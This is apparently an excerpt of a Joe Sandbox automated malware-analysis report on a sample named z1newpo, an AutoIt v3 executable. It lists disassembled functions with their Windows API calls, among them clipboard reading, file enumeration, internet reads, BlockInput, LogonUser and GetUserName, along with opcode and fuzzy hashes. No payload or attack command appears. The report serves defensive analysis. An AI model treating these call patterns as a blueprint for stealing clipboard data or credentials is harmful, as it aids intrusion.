                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                    • String ID: .lnk
                                                    • API String ID: 886957087-24824748
                                                    APIs
                                                    • OpenClipboard.USER32(?), ref: 0046DCE7
                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                    • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                    • CloseClipboard.USER32 ref: 0046DD0D
                                                    • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                    • CloseClipboard.USER32 ref: 0046DD41
                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                    • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                    • CloseClipboard.USER32 ref: 0046DD99
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                    • String ID:
                                                    • API String ID: 15083398-0
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: U$\
                                                    • API String ID: 4104443479-100911408
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNext
                                                    • String ID:
                                                    • API String ID: 3541575487-0
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                    • FindClose.KERNEL32(00000000), ref: 004339EB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: FileFind$AttributesCloseFirst
                                                    • String ID:
                                                    • API String ID: 48322524-0
                                                    • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                    • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                    • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                    • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                    APIs
                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                      • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                    • String ID:
                                                    • API String ID: 901099227-0
                                                    • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                    • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                    • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                    • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                    APIs
                                                    • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Proc
                                                    • String ID:
                                                    • API String ID: 2346855178-0
                                                    • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                    • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                    • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                    • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                    APIs
                                                    • BlockInput.USER32(00000001), ref: 0045A38B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: BlockInput
                                                    • String ID:
                                                    • API String ID: 3456056419-0
                                                    • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                    • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                    • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                    • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                    APIs
                                                    • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: LogonUser
                                                    • String ID:
                                                    • API String ID: 1244722697-0
                                                    • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                    • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                    • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                    • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                    APIs
                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: NameUser
                                                    • String ID:
                                                    • API String ID: 2645101109-0
                                                    • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                    • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                    • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                    • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                    • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                    • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                    • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: N@
                                                    • API String ID: 0-1509896676
                                                    • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                    • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                    • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                    • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                    • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                    • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                    • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                    • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                    • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                    • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                    • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                    • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                    • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                    • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                    • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                    • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1246312059.000000000426A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0426A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_426a000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                    • Instruction ID: c1261392caf82a663c7a787ebc2d1798c8cec0a44a29ff451cd5708f7cec006b
                                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                    • Instruction Fuzzy Hash: FF41D371E1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1246312059.000000000426A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0426A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_426a000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                    • Instruction ID: 3a6f542258d66134d21e7d2a3b65a2842663b56ccd01493507a4e4ea35369a5d
                                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                    • Instruction Fuzzy Hash: E8019278B2020DEFCB44DF98C5909AEF7B6FB48314F208599D819A7701E730AE81DB80
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1246312059.000000000426A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0426A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_426a000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1246312059.000000000426A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0426A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_426a000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    APIs
                                                    • DeleteObject.GDI32(?), ref: 0045953B
                                                    • DeleteObject.GDI32(?), ref: 00459551
                                                    • DestroyWindow.USER32(?), ref: 00459563
                                                    • GetDesktopWindow.USER32 ref: 00459581
                                                    • GetWindowRect.USER32(00000000), ref: 00459588
                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                    • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                    • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                    • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                    • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                    • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                    • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                    • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                    • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                    • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                    • ShowWindow.USER32(?,00000004), ref: 00459865
                                                    • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                    • GetStockObject.GDI32(00000011), ref: 004598CD
                                                    • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                    • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                    • DeleteDC.GDI32(00000000), ref: 004598F8
                                                    • _wcslen.LIBCMT ref: 00459916
                                                    • _wcscpy.LIBCMT ref: 0045993A
                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                    • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                    • GetDC.USER32(00000000), ref: 004599FC
                                                    • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                    • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                    • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                    • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                    • API String ID: 4040870279-2373415609
                                                    APIs
                                                    • GetSysColor.USER32(00000012), ref: 0044181E
                                                    • SetTextColor.GDI32(?,?), ref: 00441826
                                                    • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                    • GetSysColor.USER32(0000000F), ref: 00441849
                                                    • SetBkColor.GDI32(?,?), ref: 00441864
                                                    • SelectObject.GDI32(?,?), ref: 00441874
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                    • GetSysColor.USER32(00000010), ref: 004418B2
                                                    • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                    • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                    • DeleteObject.GDI32(?), ref: 004418D5
                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                    • FillRect.USER32(?,?,?), ref: 00441970
                                                      • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                      • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                      • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                      • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                      • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                      • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                      • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                      • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                      • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                      • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                      • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                      • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                      • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                    Memory Dump Source
